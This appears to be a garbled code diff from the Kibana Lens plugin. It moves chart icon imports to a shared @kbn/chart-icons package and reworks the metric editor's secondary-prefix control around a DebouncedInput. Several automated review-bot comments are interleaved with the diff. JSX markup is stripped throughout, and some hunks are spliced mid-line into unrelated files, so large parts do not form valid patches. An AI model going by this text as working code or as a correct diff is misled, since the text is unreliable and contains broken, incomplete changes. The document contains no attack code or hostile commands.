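Review bot: `type Props` in debounced_input.tsx is module-private while `DebouncedInput` is exported and already consumed by `NameInput` in the name_input.tsx hunk, so any wrapper that wants to forward or narrow these props has to restate the type; exporting it as `export type DebouncedInputProps = { … } & Omit<…>;` and typing both components with it changes no behaviour. The header comment on `DebouncedInput` says the extra layer forces a rerender when `defaultValue` changes but does not name the mechanism, which the garbled JSX here does not show either; if it is a `key` on `DebouncedInputHelper`, say so in that comment, since a key change remounts the helper rather than merely rerendering it.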
@@ -19,12 +19,6 @@ export const NameInput = ({ onChange: (value: string) => void; defaultValue?: string; }) => { - const { inputValue, handleInputChange, initialValue } = useDebouncedValue({ - onChange, - value, - defaultValue, - }); - return ( - { - handleInputChange(e.target.value); - }} - placeholder={initialValue} + value={value} + onChange={onChange} + defaultValue={defaultValue} /> ); diff --git a/x-pack/plugins/lens/public/shared_components/toolbar_popover.tsx b/x-pack/plugins/lens/public/shared_components/toolbar_popover.tsx index 9d806b79f8311..dbb3d69588624 100644 --- a/x-pack/plugins/lens/public/shared_components/toolbar_popover.tsx +++ b/x-pack/plugins/lens/public/shared_components/toolbar_popover.tsx @@ -9,7 +9,7 @@ import './toolbar_popover.scss'; import React, { useState } from 'react'; import { EuiFlexItem, EuiPopover, EuiIcon, EuiPopoverTitle, IconType } from '@elastic/eui'; import { ToolbarButton, ToolbarButtonProps } from '@kbn/kibana-react-plugin/public'; -import { EuiIconLegend } from '../assets/legend'; +import { EuiIconLegend } from '@kbn/chart-icons'; const typeToIconMap: { [type: string]: string | IconType } = { legend: EuiIconLegend as IconType, diff --git a/x-pack/plugins/lens/public/visualizations/datatable/components/table_basic.test.tsx b/x-pack/plugins/lens/public/visualizations/datatable/components/table_basic.test.tsx index e40b7b0c079ec..c1986b9ff7ef5 100644 --- a/x-pack/plugins/lens/public/visualizations/datatable/components/table_basic.test.tsx +++ b/x-pack/plugins/lens/public/visualizations/datatable/components/table_basic.test.tsx 
@@ -14,7 +14,7 @@ import { IAggType } from '@kbn/data-plugin/public'; import { IFieldFormat, SerializedFieldFormat } from '@kbn/field-formats-plugin/common'; import { VisualizationContainer } from '../../../visualization_container'; import { EmptyPlaceholder } from '@kbn/charts-plugin/public'; -import { LensIconChartDatatable } from '../../../assets/chart_datatable'; +import { IconChartDatatable } from '@kbn/chart-icons'; import { DataContext, DatatableComponent } from './table_basic'; import { DatatableProps } from '../../../../common/expressions'; import { chartPluginMock } from '@kbn/charts-plugin/public/mocks'; @@ -369,7 +369,7 @@ describe('DatatableComponent', () => { /> ); expect(component.find(VisualizationContainer)).toHaveLength(1); - expect(component.find(EmptyPlaceholder).prop('icon')).toEqual(LensIconChartDatatable); + expect(component.find(EmptyPlaceholder).prop('icon')).toEqual(IconChartDatatable); }); test('it renders the table with the given sorting', () => { diff --git a/x-pack/plugins/lens/public/visualizations/datatable/components/table_basic.tsx b/x-pack/plugins/lens/public/visualizations/datatable/components/table_basic.tsx index 0262d3d7cab40..fe0a7da701f2a 100644 --- a/x-pack/plugins/lens/public/visualizations/datatable/components/table_basic.tsx +++ b/x-pack/plugins/lens/public/visualizations/datatable/components/table_basic.tsx 
@@ -29,12 +29,12 @@ import { } from '@elastic/eui'; import { EmptyPlaceholder } from '@kbn/charts-plugin/public'; import { ClickTriggerEvent } from '@kbn/charts-plugin/public'; +import { IconChartDatatable } from '@kbn/chart-icons'; import type { LensTableRowContextMenuEvent } from '../../../types'; import type { FormatFactory } from '../../../../common'; import type { LensGridDirection } from '../../../../common/expressions'; import { VisualizationContainer } from '../../../visualization_container'; import { findMinMaxByColumnId } from '../../../shared_components'; -import { LensIconChartDatatable } from '../../../assets/chart_datatable'; import type { DataContextType, DatatableRenderProps, @@ -413,7 +413,7 @@ export const DatatableComponent = (props: DatatableRenderProps) => { if (isEmpty) { return ( - + ); } diff --git a/x-pack/plugins/lens/public/visualizations/datatable/visualization.tsx b/x-pack/plugins/lens/public/visualizations/datatable/visualization.tsx index 36be3492680ea..8b9f2fe4bc4ed 100644 --- a/x-pack/plugins/lens/public/visualizations/datatable/visualization.tsx +++ b/x-pack/plugins/lens/public/visualizations/datatable/visualization.tsx @@ -14,13 +14,13 @@ import { PaletteRegistry, CUSTOM_PALETTE } from '@kbn/coloring'; import { ThemeServiceStart } from '@kbn/core/public'; import { KibanaThemeProvider } from '@kbn/kibana-react-plugin/public'; import { VIS_EVENT_TO_TRIGGER } from '@kbn/visualizations-plugin/public'; +import { IconChartDatatable } from '@kbn/chart-icons'; import type { SuggestionRequest, Visualization, VisualizationSuggestion, DatasourceLayers, } from '../../types'; -import { LensIconChartDatatable } from '../../assets/chart_datatable'; import { TableDimensionEditor } from './components/dimension_editor'; import { TableDimensionEditorAdditionalSection } from './components/dimension_editor_addtional_section'; import { LayerType, layerTypes } from '../../../common'; 
@@ -56,7 +56,7 @@ export const getDatatableVisualization = ({ visualizationTypes: [ { id: 'lnsDatatable', - icon: LensIconChartDatatable, + icon: IconChartDatatable, label: visualizationLabel, groupLabel: i18n.translate('xpack.lens.datatable.groupLabel', { defaultMessage: 'Tabular', @@ -82,7 +82,7 @@ export const getDatatableVisualization = ({ getDescription() { return { - icon: LensIconChartDatatable, + icon: IconChartDatatable, label: visualizationLabel, }; }, @@ -164,7 +164,7 @@ export const getDatatableVisualization = ({ columnId: col.columnId, })), }, - previewIcon: LensIconChartDatatable, + previewIcon: IconChartDatatable, // tables are hidden from suggestion bar, but used for drag & drop and chart switching hide: true, }, diff --git a/x-pack/plugins/lens/public/visualizations/gauge/visualization.tsx b/x-pack/plugins/lens/public/visualizations/gauge/visualization.tsx index a531181a2cba5..8c35a44242955 100644 --- a/x-pack/plugins/lens/public/visualizations/gauge/visualization.tsx +++ b/x-pack/plugins/lens/public/visualizations/gauge/visualization.tsx @@ -21,9 +21,8 @@ import { getMaxValue, getMinValue, getValueFromAccessor, - VerticalBulletIcon, - HorizontalBulletIcon, } from '@kbn/expression-gauge-plugin/public'; +import { IconChartHorizontalBullet, IconChartVerticalBullet } from '@kbn/chart-icons'; import type { DatasourceLayers, OperationMetadata, Visualization } from '../../types'; import { getSuggestions } from './suggestions'; import { @@ -56,14 +55,14 @@ export const isNumericDynamicMetric = (op: OperationMetadata) => export const CHART_NAMES = { horizontalBullet: { - icon: HorizontalBulletIcon, + icon: IconChartHorizontalBullet, label: i18n.translate('xpack.lens.gaugeHorizontal.gaugeLabel', { defaultMessage: 'Gauge horizontal', }), groupLabel: groupLabelForGauge, }, verticalBullet: { - icon: VerticalBulletIcon, + icon: IconChartVerticalBullet, label: i18n.translate('xpack.lens.gaugeVertical.gaugeLabel', { defaultMessage: 'Gauge vertical', }), 
diff --git a/x-pack/plugins/lens/public/visualizations/heatmap/constants.ts b/x-pack/plugins/lens/public/visualizations/heatmap/constants.ts index 270d45ce3cec5..51e674048e873 100644 --- a/x-pack/plugins/lens/public/visualizations/heatmap/constants.ts +++ b/x-pack/plugins/lens/public/visualizations/heatmap/constants.ts @@ -6,7 +6,7 @@ */ import { i18n } from '@kbn/i18n'; -import { HeatmapIcon } from '@kbn/expression-heatmap-plugin/public'; +import { IconChartHeatmap } from '@kbn/chart-icons'; export const LENS_HEATMAP_RENDERER = 'lens_heatmap_renderer'; @@ -24,7 +24,7 @@ export const CHART_SHAPES = { export const CHART_NAMES = { heatmap: { shapeType: CHART_SHAPES.HEATMAP, - icon: HeatmapIcon, + icon: IconChartHeatmap, label: i18n.translate('xpack.lens.heatmap.heatmapLabel', { defaultMessage: 'Heat map', }), diff --git a/x-pack/plugins/lens/public/visualizations/heatmap/toolbar_component.tsx b/x-pack/plugins/lens/public/visualizations/heatmap/toolbar_component.tsx index b0a80ca297a0a..d14bf621df08e 100644 --- a/x-pack/plugins/lens/public/visualizations/heatmap/toolbar_component.tsx +++ b/x-pack/plugins/lens/public/visualizations/heatmap/toolbar_component.tsx @@ -10,6 +10,7 @@ import { EuiFlexGroup, EuiFlexItem, IconType } from '@elastic/eui'; import { Position } from '@elastic/charts'; import { i18n } from '@kbn/i18n'; import { LegendSize } from '@kbn/visualizations-plugin/public'; +import { EuiIconAxisLeft, EuiIconAxisBottom } from '@kbn/chart-icons'; import type { VisualizationToolbarProps } from '../../types'; import { LegendSettingsPopover, @@ -18,8 +19,6 @@ import { AxisTitleSettings, TooltipWrapper, } from '../../shared_components'; -import { EuiIconAxisLeft } from '../../assets/axis_left'; -import { EuiIconAxisBottom } from '../../assets/axis_bottom'; import type { HeatmapVisualizationState } from './types'; import { getDefaultVisualValuesForLayer } from '../../shared_components/datasource_default_values'; import './toolbar_component.scss'; 
diff --git a/x-pack/plugins/lens/public/visualizations/heatmap/visualization.tsx b/x-pack/plugins/lens/public/visualizations/heatmap/visualization.tsx index 2f08a31151401..09548df0a67e4 100644 --- a/x-pack/plugins/lens/public/visualizations/heatmap/visualization.tsx +++ b/x-pack/plugins/lens/public/visualizations/heatmap/visualization.tsx @@ -11,11 +11,11 @@ import { i18n } from '@kbn/i18n'; import { FormattedMessage, I18nProvider } from '@kbn/i18n-react'; import { Ast } from '@kbn/interpreter'; import { Position } from '@elastic/charts'; +import { IconChartHeatmap } from '@kbn/chart-icons'; import { CUSTOM_PALETTE, PaletteRegistry, CustomPaletteParams } from '@kbn/coloring'; import { ThemeServiceStart } from '@kbn/core/public'; import { KibanaThemeProvider } from '@kbn/kibana-react-plugin/public'; import { VIS_EVENT_TO_TRIGGER } from '@kbn/visualizations-plugin/public'; -import { HeatmapIcon } from '@kbn/expression-heatmap-plugin/public'; import type { OperationMetadata, Visualization } from '../../types'; import type { HeatmapVisualizationState } from './types'; import { getSuggestions } from './suggestions'; @@ -105,7 +105,7 @@ export const getHeatmapVisualization = ({ visualizationTypes: [ { id: 'heatmap', - icon: HeatmapIcon, + icon: IconChartHeatmap, label: i18n.translate('xpack.lens.heatmapVisualization.heatmapLabel', { defaultMessage: 'Heat map', }), diff --git a/x-pack/plugins/lens/public/visualizations/legacy_metric/metric_suggestions.ts b/x-pack/plugins/lens/public/visualizations/legacy_metric/metric_suggestions.ts index 32a5831618251..6fa35a8a17821 100644 --- a/x-pack/plugins/lens/public/visualizations/legacy_metric/metric_suggestions.ts +++ b/x-pack/plugins/lens/public/visualizations/legacy_metric/metric_suggestions.ts 
@@ -5,10 +5,10 @@ * 2.0. */ +import { IconChartMetric } from '@kbn/chart-icons'; import { SuggestionRequest, VisualizationSuggestion, TableSuggestion } from '../../types'; import type { MetricState } from '../../../common/types'; import { layerTypes } from '../../../common'; -import { LensIconChartMetric } from '../../assets/chart_metric'; import { legacyMetricSupportedTypes } from './visualization'; /** @@ -49,7 +49,7 @@ function getSuggestion(table: TableSuggestion): VisualizationSuggestion { const original = jest.requireActual('lodash'); @@ -64,39 +65,43 @@ describe('dimension editor', () => { palette, }; - const mockedFrame = createMockFramePublicAPI(); - - const props: VisualizationDimensionEditorProps & { + let props: VisualizationDimensionEditorProps & { paletteService: PaletteRegistry; - } = { - layerId: 'first', - groupId: 'some-group', - accessor: 'some-accessor', - state: fullState, - frame: mockedFrame, - setState: jest.fn(), - panelRef: {} as React.MutableRefObject, - paletteService: chartPluginMock.createPaletteRegistry(), }; + beforeEach(() => { + props = { + layerId: 'first', + groupId: 'some-group', + accessor: 'some-accessor', + state: fullState, + frame: createMockFramePublicAPI(), + setState: jest.fn(), + panelRef: {} as React.MutableRefObject, + paletteService: chartPluginMock.createPaletteRegistry(), + }; + }); + describe('primary metric dimension', () => { const accessor = 'primary-metric-col-id'; - props.frame.activeData = { - first: { - type: 'datatable', - columns: [ - { - id: accessor, - name: 'foo', - meta: { - type: 'number', + beforeEach(() => { + props.frame.activeData = { + first: { + type: 'datatable', + columns: [ + { + id: accessor, + name: 'foo', + meta: { + type: 'number', + }, }, - }, - ], - rows: [], - }, - }; + ], + rows: [], + }, + }; + }); class Harness { public _wrapper; 
@@ -200,6 +205,24 @@ describe('dimension editor', () => { describe('secondary metric dimension', () => { const accessor = 'secondary-metric-col-id'; + beforeEach(() => { + props.frame.activeData = { + first: { + type: 'datatable', + columns: [ + { + id: accessor, + name: 'foo', + meta: { + type: 'number', + }, + }, + ], + rows: [], + }, + }; + }); + it('renders when the accessor matches', () => { const component = shallow( { expect(component.exists(SELECTORS.PRIMARY_METRIC_EDITOR)).toBeFalsy(); }); - it('sets metric prefix', () => { - const setState = jest.fn(); - const localState = { ...fullState, secondaryMetricAccessor: accessor }; - const component = shallow( - - ); + describe('metric prefix', () => { + const NONE_PREFIX = ''; + const AUTO_PREFIX = undefined; + + it('activates the correct buttons', () => { + const setState = jest.fn(); + const localState = { + ...fullState, + secondaryPrefix: AUTO_PREFIX, + secondaryMetricAccessor: accessor, + }; + const component = mount( + + ); + + expect(component.find(EuiButtonGroup).props().idSelected).toContain('auto'); + + component.setProps({ + state: { + ...localState, + secondaryPrefix: NONE_PREFIX, + }, + }); - const newVal = 'Metric explanation'; - component.find(EuiFieldText).props().onChange!({ - target: { value: newVal }, - } as ChangeEvent); - expect(setState).toHaveBeenCalledWith({ ...localState, secondaryPrefix: newVal }); + expect(component.find(EuiButtonGroup).props().idSelected).toContain('none'); + + component.setProps({ + state: { + ...localState, + secondaryPrefix: 'some custom prefix', + }, + }); + + expect(component.find(EuiButtonGroup).props().idSelected).toContain('custom'); + }); + + it('clicking a button sets the prefix value', () => { + const setState = jest.fn(); + const localState = { + ...fullState, + secondaryPrefix: AUTO_PREFIX, + secondaryMetricAccessor: accessor, + }; + const component = mount( + + ); + + const newVal = 'Metric explanation'; + + 
component.find(EuiButtonGroup).props().onChange('some-id', newVal); + + expect(setState).toHaveBeenCalledWith({ ...localState, secondaryPrefix: newVal }); + }); + + it('sets a custom prefix value', () => { + const setState = jest.fn(); + const localState = { + ...fullState, + secondaryPrefix: 'foo', + secondaryMetricAccessor: accessor, + }; + const component = mount( + + ); + + const buttonGroup = component.find(EuiButtonGroup); + + // make sure that if the user was to select the "custom" option, they would get the default value + expect(buttonGroup.props().options[1].value).toBe('foo'); + + const newVal = 'bar'; + + component.find(DebouncedInput).props().onChange(newVal); + + expect(setState).toHaveBeenCalledWith({ ...localState, secondaryPrefix: newVal }); + }); }); }); diff --git a/x-pack/plugins/lens/public/visualizations/metric/dimension_editor.tsx b/x-pack/plugins/lens/public/visualizations/metric/dimension_editor.tsx index 198f3dd755ebc..4439b22cd705f 100644 --- a/x-pack/plugins/lens/public/visualizations/metric/dimension_editor.tsx +++ b/x-pack/plugins/lens/public/visualizations/metric/dimension_editor.tsx @@ -11,12 +11,12 @@ import { EuiColorPaletteDisplay, EuiFormRow, EuiFlexItem, - EuiFieldText, EuiButtonGroup, EuiFieldNumber, htmlIdGenerator, EuiColorPicker, euiPaletteColorBlind, + EuiSpacer, } from '@elastic/eui'; import { LayoutDirection } from '@elastic/charts'; import React, { useCallback, useState } from 'react'; @@ -30,6 +30,7 @@ import { } from '@kbn/coloring'; import { getDataBoundsForPalette } from '@kbn/expression-metric-vis-plugin/public'; import { css } from '@emotion/react'; +import { getColumnByAccessor } from '@kbn/visualizations-plugin/common/utils'; import { isNumericFieldForDatatable } from '../../../common/expressions'; import { applyPaletteParams, 
@@ -40,63 +41,42 @@ import type { VisualizationDimensionEditorProps } from '../../types'; import { defaultNumberPaletteParams, defaultPercentagePaletteParams } from './palette_config'; import { DEFAULT_MAX_COLUMNS, getDefaultColor, MetricVisualizationState } from './visualization'; import { CollapseSetting } from '../../shared_components/collapse_setting'; +import { DebouncedInput } from '../../shared_components/debounced_input'; type Props = VisualizationDimensionEditorProps & { paletteService: PaletteRegistry; }; -export function DimensionEditor(props: Props) { - const { state, setState, accessor } = props; +type SubProps = Props & { idPrefix: string }; - const setPrefix = useCallback( - (prefix: string) => setState({ ...state, secondaryPrefix: prefix }), - [setState, state] - ); +export function DimensionEditor(props: Props) { + const { state, accessor } = props; - const { inputValue: prefixInputVal, handleInputChange: handlePrefixChange } = - useDebouncedValue( - { - onChange: setPrefix, - value: state.secondaryPrefix || '', - }, - { allowFalsyValue: true } - ); + const idPrefix = htmlIdGenerator()(); switch (accessor) { case state?.metricAccessor: return (

- +
); case state.secondaryMetricAccessor: return (
- - handlePrefixChange(value)} - /> - +
); case state.maxAccessor: return ( -
- +
+
); case state.breakdownByAccessor: return (
- +
); default: @@ -104,7 +84,7 @@ export function DimensionEditor(props: Props) { } } -function BreakdownByEditor({ setState, state }: Props) { +function BreakdownByEditor({ setState, state }: SubProps) { const setMaxCols = useCallback( (columns: string) => { setState({ ...state, maxCols: parseInt(columns, 10) }); @@ -148,8 +128,7 @@ function BreakdownByEditor({ setState, state }: Props) { ); } -function MaximumEditor({ setState, state }: Props) { - const idPrefix = htmlIdGenerator()(); +function MaximumEditor({ setState, state, idPrefix }: SubProps) { return ( + + <> + { + setState({ + ...state, + secondaryPrefix, + }); + }} + /> + + {state.secondaryPrefix && ( + { + setState({ + ...state, + secondaryPrefix: newPrefix, + }); + }} + /> + )} + + +
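Review bot: `const idPrefix = htmlIdGenerator()();` in the new DimensionEditor body runs on every render, so every sub-editor gets a fresh id prefix each time the panel re-renders; MaximumEditor previously did the same thing locally, but this hunk now feeds one per-render prefix to all four editors. Since `useState` is already imported in this file, `const [idPrefix] = useState(() => htmlIdGenerator()());` keeps the generated ids stable for the life of the component at no extra cost. The JSX inside this hunk is not rendered in this view, so I cannot confirm which props consume the prefix beyond the `idPrefix` destructured in MaximumEditor.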
+ ); +} + +function PrimaryMetricEditor(props: SubProps) { + const { state, setState, frame, accessor, idPrefix } = props; const [isPaletteOpen, setIsPaletteOpen] = useState(false); @@ -235,7 +294,6 @@ function PrimaryMetricEditor(props: Props) { const togglePalette = () => setIsPaletteOpen(!isPaletteOpen); - const idPrefix = htmlIdGenerator()(); return ( <> { }, title: 'Metric', hide: true, - previewIcon: LensIconChartMetric, + previewIcon: IconChartMetric, score: 0.51, }, ]); @@ -182,7 +182,7 @@ describe('metric suggestions', () => { }, title: 'Metric', hide: true, - previewIcon: LensIconChartMetric, + previewIcon: IconChartMetric, score: 0.51, }, ]); @@ -214,7 +214,7 @@ describe('metric suggestions', () => { }, title: 'Metric', hide: true, - previewIcon: LensIconChartMetric, + previewIcon: IconChartMetric, score: 0.51, }, ]); @@ -287,7 +287,7 @@ describe('metric suggestions', () => { }, title: 'Metric', hide: true, - previewIcon: LensIconChartMetric, + previewIcon: IconChartMetric, score: 0.52, }, ]); @@ -319,7 +319,7 @@ describe('metric suggestions', () => { }, title: 'Metric', hide: true, - previewIcon: LensIconChartMetric, + previewIcon: IconChartMetric, score: 0.52, }, ]); @@ -350,7 +350,7 @@ describe('metric suggestions', () => { }, title: 'Metric', hide: true, - previewIcon: LensIconChartMetric, + previewIcon: IconChartMetric, score: 0.52, }, ]); diff --git a/x-pack/plugins/lens/public/visualizations/metric/suggestions.ts b/x-pack/plugins/lens/public/visualizations/metric/suggestions.ts index cdb11812bc4b8..ae40bf83574f4 100644 --- a/x-pack/plugins/lens/public/visualizations/metric/suggestions.ts +++ b/x-pack/plugins/lens/public/visualizations/metric/suggestions.ts 
@@ -5,8 +5,8 @@ * 2.0. */ +import { IconChartMetric } from '@kbn/chart-icons'; import type { TableSuggestion, Visualization } from '../../types'; -import { LensIconChartMetric } from '../../assets/chart_metric'; import { layerTypes } from '../../../common'; import { metricLabel, MetricVisualizationState, supportedDataTypes } from './visualization'; @@ -59,7 +59,7 @@ export const getSuggestions: Visualization['getSuggest layerType: layerTypes.DATA, }, title: metricLabel, - previewIcon: LensIconChartMetric, + previewIcon: IconChartMetric, score: 0.5, // don't show suggestions since we're in tech preview hide: true, diff --git a/x-pack/plugins/lens/public/visualizations/metric/visualization.tsx b/x-pack/plugins/lens/public/visualizations/metric/visualization.tsx index 8651d4b76e95b..cb1d5a53c8e3c 100644 --- a/x-pack/plugins/lens/public/visualizations/metric/visualization.tsx +++ b/x-pack/plugins/lens/public/visualizations/metric/visualization.tsx @@ -16,9 +16,9 @@ import { VIS_EVENT_TO_TRIGGER } from '@kbn/visualizations-plugin/public'; import { LayoutDirection } from '@elastic/charts'; import { euiLightVars, euiThemeVars } from '@kbn/ui-theme'; import { KibanaThemeProvider } from '@kbn/kibana-react-plugin/public'; +import { IconChartMetric } from '@kbn/chart-icons'; import { LayerType } from '../../../common'; import { getSuggestions } from './suggestions'; -import { LensIconChartMetric } from '../../assets/chart_metric'; import { Visualization, OperationMetadata, DatasourceLayers, AccessorConfig } from '../../types'; import { layerTypes } from '../../../common'; import { GROUP_ID, LENS_METRIC_ID } from './constants'; 
@@ -125,7 +125,8 @@ const toExpression = ( arguments: { metric: state.metricAccessor ? [state.metricAccessor] : [], secondaryMetric: state.secondaryMetricAccessor ? [state.secondaryMetricAccessor] : [], - secondaryPrefix: state.secondaryPrefix ? [state.secondaryPrefix] : [], + secondaryPrefix: + typeof state.secondaryPrefix !== 'undefined' ? [state.secondaryPrefix] : [], max: state.maxAccessor ? [state.maxAccessor] : [], breakdownBy: state.breakdownByAccessor && !state.collapseFn ? [state.breakdownByAccessor] : [], @@ -166,7 +167,7 @@ export const getMetricVisualization = ({ visualizationTypes: [ { id: LENS_METRIC_ID, - icon: LensIconChartMetric, + icon: IconChartMetric, label: metricLabel, groupLabel: metricGroupLabel, showExperimentalBadge: true, @@ -197,7 +198,7 @@ export const getMetricVisualization = ({ getDescription() { return { - icon: LensIconChartMetric, + icon: IconChartMetric, label: metricLabel, }; }, diff --git a/x-pack/plugins/lens/public/visualizations/partition/partition_charts_meta.ts b/x-pack/plugins/lens/public/visualizations/partition/partition_charts_meta.ts index 6d948ce4332fc..888fe7853b27b 100644 --- a/x-pack/plugins/lens/public/visualizations/partition/partition_charts_meta.ts +++ b/x-pack/plugins/lens/public/visualizations/partition/partition_charts_meta.ts @@ -9,11 +9,13 @@ import { i18n } from '@kbn/i18n'; import type { EuiIconProps } from '@elastic/eui'; import type { DatatableColumn } from '@kbn/expressions-plugin/common'; -import { LensIconChartDonut } from '../../assets/chart_donut'; -import { LensIconChartPie } from '../../assets/chart_pie'; -import { LensIconChartTreemap } from '../../assets/chart_treemap'; -import { LensIconChartMosaic } from '../../assets/chart_mosaic'; -import { LensIconChartWaffle } from '../../assets/chart_waffle'; +import { + IconChartDonut, + IconChartPie, + IconChartTreemap, + IconChartMosaic, + IconChartWaffle, +} from '@kbn/chart-icons'; import { CategoryDisplay, NumberDisplay, 
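Review bot: The new `typeof state.secondaryPrefix !== 'undefined'` check in toExpression now forwards an empty string, which the editor tests in this diff treat as the explicit "none" prefix (`NONE_PREFIX = ''`) as opposed to `undefined` for "auto"; that distinction is the whole reason for the change and deserves a comment so a later cleanup does not revert it to a truthiness check. I would add `// '' is an explicit "no prefix"; only undefined means "auto", so a truthy check would be wrong here` above the `secondaryPrefix:` key. toExpression starts outside this hunk, and how the expression function treats an empty prefix argument is not visible here.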
@@ -140,7 +142,7 @@ const emptySizeRatioOptions: PartitionChartMeta['toolbarPopover']['emptySizeRati export const PartitionChartsMeta: Record = { donut: { - icon: LensIconChartDonut, + icon: IconChartDonut, label: i18n.translate('xpack.lens.pie.donutLabel', { defaultMessage: 'Donut', }), @@ -156,7 +158,7 @@ export const PartitionChartsMeta: Record = { }, }, pie: { - icon: LensIconChartPie, + icon: IconChartPie, label: i18n.translate('xpack.lens.pie.pielabel', { defaultMessage: 'Pie', }), @@ -171,7 +173,7 @@ export const PartitionChartsMeta: Record = { }, }, treemap: { - icon: LensIconChartTreemap, + icon: IconChartTreemap, label: i18n.translate('xpack.lens.pie.treemaplabel', { defaultMessage: 'Treemap', }), @@ -186,7 +188,7 @@ export const PartitionChartsMeta: Record = { }, }, mosaic: { - icon: LensIconChartMosaic, + icon: IconChartMosaic, label: i18n.translate('xpack.lens.pie.mosaiclabel', { defaultMessage: 'Mosaic', }), @@ -203,7 +205,7 @@ export const PartitionChartsMeta: Record = { requiredMinDimensionCount: 2, }, waffle: { - icon: LensIconChartWaffle, + icon: IconChartWaffle, label: i18n.translate('xpack.lens.pie.wafflelabel', { defaultMessage: 'Waffle', }), diff --git a/x-pack/plugins/lens/public/visualizations/xy/annotations/helpers.tsx b/x-pack/plugins/lens/public/visualizations/xy/annotations/helpers.tsx index 480417ab2cbad..4c60934ef9114 100644 --- a/x-pack/plugins/lens/public/visualizations/xy/annotations/helpers.tsx +++ b/x-pack/plugins/lens/public/visualizations/xy/annotations/helpers.tsx @@ -13,6 +13,7 @@ import { isRangeAnnotation, } from '@kbn/event-annotation-plugin/public'; import { EventAnnotationConfig } from '@kbn/event-annotation-plugin/common'; +import { IconChartBarAnnotations } from '@kbn/chart-icons'; import { layerTypes } from '../../../../common'; import type { FramePublicAPI, Visualization } from '../../../types'; import { isHorizontalChart } from '../state_helpers'; 
@@ -24,7 +25,6 @@ import { getDataLayers, isAnnotationsLayer, } from '../visualization_helpers'; -import { LensIconChartBarAnnotations } from '../../../assets/chart_bar_annotations'; import { generateId } from '../../../id_generator'; const MAX_DATE = 8640000000000000; @@ -106,7 +106,7 @@ export const getAnnotationsSupportedLayer = ( label: i18n.translate('xpack.lens.xyChart.addAnnotationsLayerLabel', { defaultMessage: 'Annotations', }), - icon: LensIconChartBarAnnotations, + icon: IconChartBarAnnotations, disabled: !hasDateHistogram, toolTipContent: !hasDateHistogram ? i18n.translate('xpack.lens.xyChart.addAnnotationsLayerLabelDisabledHelp', { diff --git a/x-pack/plugins/lens/public/visualizations/xy/reference_line_helpers.tsx b/x-pack/plugins/lens/public/visualizations/xy/reference_line_helpers.tsx index 293dd8e67db8f..362b63c46eb2d 100644 --- a/x-pack/plugins/lens/public/visualizations/xy/reference_line_helpers.tsx +++ b/x-pack/plugins/lens/public/visualizations/xy/reference_line_helpers.tsx @@ -8,6 +8,7 @@ import { groupBy, partition } from 'lodash'; import { i18n } from '@kbn/i18n'; import { Datatable } from '@kbn/expressions-plugin/public'; +import { IconChartBarReferenceLine } from '@kbn/chart-icons'; import { layerTypes } from '../../../common'; import type { DatasourceLayers, FramePublicAPI, Visualization } from '../../types'; import { groupAxesByType } from './axes_configuration'; @@ -28,7 +29,6 @@ import { isReferenceLayer, } from './visualization_helpers'; import { generateId } from '../../id_generator'; -import { LensIconChartBarReferenceLine } from '../../assets/chart_bar_reference_line'; import { defaultReferenceLineColor } from './color_assignment'; export interface ReferenceLineBase { 
@@ -318,7 +318,7 @@ export const getReferenceSupportedLayer = ( label: i18n.translate('xpack.lens.xyChart.addReferenceLineLayerLabel', { defaultMessage: 'Reference lines', }), - icon: LensIconChartBarReferenceLine, + icon: IconChartBarReferenceLine, disabled: !filledDataLayers.length || (!dataLayers.some(layerHasNumberHistogram) && diff --git a/x-pack/plugins/lens/public/visualizations/xy/types.ts b/x-pack/plugins/lens/public/visualizations/xy/types.ts index c2ca25c61c42e..8e140b83cb552 100644 --- a/x-pack/plugins/lens/public/visualizations/xy/types.ts +++ b/x-pack/plugins/lens/public/visualizations/xy/types.ts @@ -22,16 +22,18 @@ import type { YAxisConfig, } from '@kbn/expression-xy-plugin/common'; import { EventAnnotationConfig } from '@kbn/event-annotation-plugin/common'; -import { LensIconChartArea } from '../../assets/chart_area'; -import { LensIconChartAreaStacked } from '../../assets/chart_area_stacked'; -import { LensIconChartAreaPercentage } from '../../assets/chart_area_percentage'; -import { LensIconChartBar } from '../../assets/chart_bar'; -import { LensIconChartBarStacked } from '../../assets/chart_bar_stacked'; -import { LensIconChartBarPercentage } from '../../assets/chart_bar_percentage'; -import { LensIconChartBarHorizontal } from '../../assets/chart_bar_horizontal'; -import { LensIconChartBarHorizontalStacked } from '../../assets/chart_bar_horizontal_stacked'; -import { LensIconChartBarHorizontalPercentage } from '../../assets/chart_bar_horizontal_percentage'; -import { LensIconChartLine } from '../../assets/chart_line'; +import { + IconChartArea, + IconChartLine, + IconChartAreaStacked, + IconChartBarHorizontalStacked, + IconChartBarHorizontalPercentage, + IconChartAreaPercentage, + IconChartBar, + IconChartBarStacked, + IconChartBarPercentage, + IconChartBarHorizontal, +} from '@kbn/chart-icons'; import type { VisualizationType, Suggestion } from '../../types'; import type { ValueLabelConfig } from '../../../common/types'; 
@@ -168,7 +170,7 @@ const groupLabelForLineAndArea = i18n.translate('xpack.lens.xyVisualization.line export const visualizationTypes: VisualizationType[] = [ { id: 'bar', - icon: LensIconChartBar, + icon: IconChartBar, label: i18n.translate('xpack.lens.xyVisualization.barLabel', { defaultMessage: 'Bar vertical', }), @@ -177,7 +179,7 @@ export const visualizationTypes: VisualizationType[] = [ }, { id: 'bar_horizontal', - icon: LensIconChartBarHorizontal, + icon: IconChartBarHorizontal, label: i18n.translate('xpack.lens.xyVisualization.barHorizontalLabel', { defaultMessage: 'H. Bar', }), @@ -188,7 +190,7 @@ export const visualizationTypes: VisualizationType[] = [ }, { id: 'bar_stacked', - icon: LensIconChartBarStacked, + icon: IconChartBarStacked, label: i18n.translate('xpack.lens.xyVisualization.stackedBarLabel', { defaultMessage: 'Bar vertical stacked', }), @@ -196,7 +198,7 @@ export const visualizationTypes: VisualizationType[] = [ }, { id: 'bar_percentage_stacked', - icon: LensIconChartBarPercentage, + icon: IconChartBarPercentage, label: i18n.translate('xpack.lens.xyVisualization.stackedPercentageBarLabel', { defaultMessage: 'Bar vertical percentage', }), @@ -204,7 +206,7 @@ export const visualizationTypes: VisualizationType[] = [ }, { id: 'bar_horizontal_stacked', - icon: LensIconChartBarHorizontalStacked, + icon: IconChartBarHorizontalStacked, label: i18n.translate('xpack.lens.xyVisualization.stackedBarHorizontalLabel', { defaultMessage: 'H. Stacked bar', }), @@ -215,7 +217,7 @@ export const visualizationTypes: VisualizationType[] = [ }, { id: 'bar_horizontal_percentage_stacked', - icon: LensIconChartBarHorizontalPercentage, + icon: IconChartBarHorizontalPercentage, label: 